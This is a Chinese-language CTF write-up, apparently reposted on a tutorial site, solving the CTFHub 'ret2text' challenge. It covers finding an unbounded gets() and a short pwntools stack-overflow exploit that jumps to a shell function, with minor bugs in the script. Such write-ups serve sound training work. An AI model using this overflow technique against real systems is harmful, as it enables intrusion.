C/C++教程
CTFHUB(PWN)Ret2Text
本文主要是介绍CTFHUB(PWN)Ret2Text,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
首先检查保护机制 checksec
64 位 + 什么保护都没开
然后放到ida64中查看
发现gets函数,没有限制数据的长度,容易发生栈溢出
shift+F12 找到bin_sh函数地址
64位程序直接读取偏移量
构造payload,编写exp
from pwn import*
p=remote("ip",端口)
binsh_addr=地址
payload='a'*(0x70+8)+p64(bin_sh)
p.sendline(payload)
p.interactive
连接成功后ls
cat flag
这篇关于CTFHUB(PWN)Ret2Text的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
您可能喜欢
-
怎么使用nsenter命令进入容器?-icode9专业技术文章分享12-26
-
导入文件提示存在乱码,请确定使用的是UTF-8编码怎么解决?-icode9专业技术文章分享12-26
-
csv文件怎么设置编码?-icode9专业技术文章分享12-26
-
TypeScript基础知识详解12-25
-
安卓NDK 是什么?-icode9专业技术文章分享12-25
-
caddy 可以定义日志到 文件吗?-icode9专业技术文章分享12-25
-
wordfence如何设置密码规则?-icode9专业技术文章分享12-25
-
有哪些方法可以实现 DLL 文件路径的管理?-icode9专业技术文章分享12-25
-
错误信息 "At least one element in the source array could not be cast down to the destination array-icode9专业技术文章分享12-25
-
'flutter' 不是内部或外部命令,也不是可运行的程序 或批处理文件。错误信息提示什么意思?-icode9专业技术文章分享12-25
-
flutter项目 as提示Cannot resolve symbol 'embedding'提示什么意思?-icode9专业技术文章分享12-25
-
怎么切换 Git 项目的远程仓库地址?-icode9专业技术文章分享12-24
-
怎么更改 Git 远程仓库的名称?-icode9专业技术文章分享12-24
-
更改 Git 本地分支关联的远程分支是什么命令?-icode9专业技术文章分享12-24
-
uniapp 连接之后会被立马断开是什么原因?-icode9专业技术文章分享12-24
栏目导航
